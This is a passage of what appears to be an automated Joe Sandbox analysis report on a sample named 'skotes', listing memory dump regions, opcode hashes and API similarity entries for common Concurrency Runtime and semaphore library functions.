                                                                                                                                              • Associated: 00000005.00000002.3337715504.0000000000662000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3338866773.0000000000669000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3340778400.000000000066A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3341774303.0000000000671000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342394644.0000000000673000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342875922.000000000067B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344228340.000000000067F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344851185.0000000000680000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346052698.0000000000681000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346881863.0000000000682000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3347843501.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3348907952.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.000000000068C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3351570636.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3352270174.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353013061.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353390429.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353567936.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353855620.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353897524.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353939926.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353978674.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Concurrency::details::FreeIdleProcessorRoot::SpinUntilVirtualstd::invalid_argument::invalid_argument
                                                                                                                                              • String ID: pContext
                                                                                                                                              • API String ID: 3390424672-2046700901
                                                                                                                                              • Opcode ID: 9018f8aa5e2f1dcdf8aa9758c803532e755f7d857994937d6ffca288971cc1e0
                                                                                                                                              • Instruction ID: 942ad2940211714a74bcc9dfb36523be2d48a1416fc9e5f4f6d4d921a905eb8f
                                                                                                                                              • Opcode Fuzzy Hash: 9018f8aa5e2f1dcdf8aa9758c803532e755f7d857994937d6ffca288971cc1e0
                                                                                                                                              • Instruction Fuzzy Hash: 2F113639A002149BCB05FF58C88596D77A5AF8C365F18406BEC0297362DB3CED05CBD8
                                                                                                                                              Function 00420C5C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • Concurrency::details::_NonReentrantLock::_Acquire.LIBCONCRT ref: 00420CD7
                                                                                                                                              • Concurrency::details::ResourceManager::ResourceManager.LIBCONCRT ref: 00420D2A
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000005.00000002.3295638397.0000000000400000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3295768977.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3296575174.0000000000469000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3300137664.000000000046B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3301567083.0000000000475000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3302714861.0000000000476000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3303512985.0000000000477000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3310859878.00000000005D0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311580448.00000000005D2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311981718.00000000005E0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3313837108.00000000005E1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005EC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3315473059.00000000005F0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3316471148.00000000005F1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3317503573.00000000005F2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3318308078.00000000005F4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3319126701.00000000005F5000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3320324855.00000000005F6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3322091817.0000000000607000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3323116364.0000000000608000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3325761739.000000000061E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327109512.000000000061F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327712369.0000000000627000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3328341039.0000000000630000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3329760768.0000000000654000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3334212055.000000000065E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3336247440.000000000065F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3337715504.0000000000662000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3338866773.0000000000669000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3340778400.000000000066A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3341774303.0000000000671000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342394644.0000000000673000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342875922.000000000067B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344228340.000000000067F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344851185.0000000000680000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346052698.0000000000681000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346881863.0000000000682000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3347843501.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3348907952.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.000000000068C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3351570636.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3352270174.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353013061.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353390429.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353567936.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353855620.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353897524.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353939926.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353978674.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Resource$AcquireConcurrency::details::Concurrency::details::_Lock::_ManagerManager::Reentrant
                                                                                                                                              • String ID: p[F
                                                                                                                                              • API String ID: 3303180142-1832964472
                                                                                                                                              • Opcode ID: 012c7f1a2334d7d7d61e610fd75b16390fda9d2be80b27e1d08c83141fa46920
                                                                                                                                              • Instruction ID: 460490d00550286d74d196cd5a9549fc7c942c0fed1932104b3464a6bc3d5762
                                                                                                                                              • Opcode Fuzzy Hash: 012c7f1a2334d7d7d61e610fd75b16390fda9d2be80b27e1d08c83141fa46920
                                                                                                                                              • Instruction Fuzzy Hash: 510180B0F156249EDB10ABBA755135DA6E06B08318FA0406FE405EB283DA7C5E41876E
                                                                                                                                              Function 0041CAD4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMONLIBRARYCODE
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • CreateSemaphoreExW.KERNEL32(?,004265E3,00000000,00000000,7FFFFFFF,00000000,00000000,001F0003,00000000), ref: 0041CAFC
                                                                                                                                              • CreateSemaphoreW.KERNEL32(?,004265E3,00000000,00000000,7FFFFFFF,00000000,00000000,001F0003,00000000), ref: 0041CB1E
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000005.00000002.3295638397.0000000000400000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3295768977.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3296575174.0000000000469000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3300137664.000000000046B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3301567083.0000000000475000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3302714861.0000000000476000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3303512985.0000000000477000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3310859878.00000000005D0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311580448.00000000005D2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311981718.00000000005E0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3313837108.00000000005E1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005EC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3315473059.00000000005F0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3316471148.00000000005F1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3317503573.00000000005F2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3318308078.00000000005F4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3319126701.00000000005F5000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3320324855.00000000005F6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3322091817.0000000000607000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3323116364.0000000000608000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3325761739.000000000061E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327109512.000000000061F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327712369.0000000000627000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3328341039.0000000000630000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3329760768.0000000000654000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3334212055.000000000065E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3336247440.000000000065F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3337715504.0000000000662000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3338866773.0000000000669000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3340778400.000000000066A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3341774303.0000000000671000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342394644.0000000000673000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342875922.000000000067B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344228340.000000000067F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344851185.0000000000680000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346052698.0000000000681000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346881863.0000000000682000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3347843501.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3348907952.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.000000000068C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3351570636.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3352270174.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353013061.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353390429.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353567936.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353855620.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353897524.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353939926.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353978674.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateSemaphore
                                                                                                                                              • String ID: eB
                                                                                                                                              • API String ID: 1078844751-1684614082
                                                                                                                                              • Opcode ID: 0a75b26758247ccc1e2d1fda373b884fd510e78a53fedf65ba4e2f52d09dbcb4
                                                                                                                                              • Instruction ID: d803559eaad54cb2c3b4018db65bf1de4fef6802ea1d0146d559ec521011be2d
                                                                                                                                              • Opcode Fuzzy Hash: 0a75b26758247ccc1e2d1fda373b884fd510e78a53fedf65ba4e2f52d09dbcb4
                                                                                                                                              • Instruction Fuzzy Hash: 27F0B73A545129ABCF125F50EC0589E7F76FB08751B044065FD0996230C676AC61EF95
                                                                                                                                              Function 0042B92C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28threadCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • Concurrency::details::FreeThreadProxy::ReturnIdleProxy.LIBCONCRT ref: 0042B94E
                                                                                                                                              • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042B961
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000005.00000002.3295638397.0000000000400000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3295768977.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3296575174.0000000000469000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3300137664.000000000046B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3301567083.0000000000475000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3302714861.0000000000476000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3303512985.0000000000477000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3310859878.00000000005D0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311580448.00000000005D2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311981718.00000000005E0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3313837108.00000000005E1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005EC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3315473059.00000000005F0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3316471148.00000000005F1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3317503573.00000000005F2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3318308078.00000000005F4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3319126701.00000000005F5000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3320324855.00000000005F6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3322091817.0000000000607000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3323116364.0000000000608000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3325761739.000000000061E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327109512.000000000061F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327712369.0000000000627000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3328341039.0000000000630000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3329760768.0000000000654000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3334212055.000000000065E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3336247440.000000000065F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3337715504.0000000000662000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3338866773.0000000000669000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3340778400.000000000066A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3341774303.0000000000671000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342394644.0000000000673000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342875922.000000000067B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344228340.000000000067F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344851185.0000000000680000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346052698.0000000000681000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346881863.0000000000682000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3347843501.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3348907952.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.000000000068C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3351570636.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3352270174.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353013061.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353390429.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353567936.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353855620.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353897524.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353939926.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353978674.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Concurrency::details::FreeIdleProxyProxy::ReturnThreadstd::invalid_argument::invalid_argument
                                                                                                                                              • String ID: pContext
                                                                                                                                              • API String ID: 548886458-2046700901
                                                                                                                                              • Opcode ID: 591562eb5e40e8e05a9c3289778601861637afb68b27e25a0bad12f2dc797774
                                                                                                                                              • Instruction ID: 6d6ffe11be8a4b1ace8c2f2c8a58b350c0e533cc07d7fbfc7cd1cba97992ca6a
                                                                                                                                              • Opcode Fuzzy Hash: 591562eb5e40e8e05a9c3289778601861637afb68b27e25a0bad12f2dc797774
                                                                                                                                              • Instruction Fuzzy Hash: 95E02B39B0020467CB04F7A5D845D9DBB789E84715710401BE911A3352EB78AA44C6D8
                                                                                                                                              Function 004234CC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • std::invalid_argument::invalid_argument.LIBCONCRT ref: 004234FC
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000005.00000002.3295638397.0000000000400000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3295768977.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3296575174.0000000000469000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3300137664.000000000046B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3301567083.0000000000475000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3302714861.0000000000476000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3303512985.0000000000477000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3310859878.00000000005D0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311580448.00000000005D2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311981718.00000000005E0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3313837108.00000000005E1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005EC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3315473059.00000000005F0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3316471148.00000000005F1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3317503573.00000000005F2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3318308078.00000000005F4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3319126701.00000000005F5000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3320324855.00000000005F6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3322091817.0000000000607000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3323116364.0000000000608000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3325761739.000000000061E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327109512.000000000061F000.00000040.00000001.01000000.00000008.sdmpDownload File
